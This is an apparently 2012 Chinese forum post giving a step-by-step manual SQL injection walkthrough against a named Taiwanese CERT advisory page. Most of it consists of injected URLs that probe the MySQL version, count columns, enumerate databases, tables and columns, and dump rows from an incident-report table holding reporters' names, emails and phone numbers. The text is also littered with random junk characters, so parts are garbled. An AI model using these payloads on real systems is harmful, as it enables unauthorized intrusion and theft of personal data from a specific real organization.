1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
9 H. D A3 [6 E% d' s w2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
, q& M" V0 v/ O1 lhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--# A5 ?7 b1 n) g4 O/ [/ ?1 T
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
( }: R+ m5 J8 i( T1 @% H数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
7 a/ N; y8 T b! j& v# O4.判断有没有写权限
5 A5 n& j# B3 m7 @7 v) L Ihttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
: [8 b0 v' Q. p. i& Z: |$ i. l没办法,手动猜表啦& X' p% e1 u+ i% s& x
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1# v) t6 O" ?- u. g7 E
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下0 |3 Z$ O- R+ C
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
, I6 Y) l$ e5 g1 d5 o# Z成功查出所有数据库,国外的黑客就是不一般。数据库如下:* N6 d( V7 a; N$ c. V# i- p& `* \
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb+ z ^. m( q3 t$ j4 D* F
6.爆表,爆的是twcert库' r2 J; f2 S" }5 s n
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--& J2 c( r( T& P, A9 [
爆出如下表
) i) C+ R7 d: B" |4 s c& L! ?8 Hdownloadfile,irsys,newsdata,secrpt,secrpt_big5
5 {: @9 G& I" t8 C: ?1 Y7.爆列名,这次爆的是irsys表6 V) ^4 w- j1 ^; ~+ @6 z! m
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--$ R( q/ u% u! f1 z) C% ?6 E( u( D
爆出如下列3 Z! t5 m5 @& `2 K" U" }
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status, N3 x8 ~; G" l0 z( f! a
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
; {+ G5 f' h5 {9 l7 `" `http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
% m/ s7 C" B# E i返回是3,说明每个列里有3个地段, B+ ^ d, G& D1 P' p3 \
9.爆字段内容( O- b/ `: i9 D
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--& G/ _5 q7 @6 e( e
爆出name列的第一个字段的内容1 Z9 S$ S* g! s% i: |
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--1 H3 i7 c4 A3 }6 x: O3 _
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对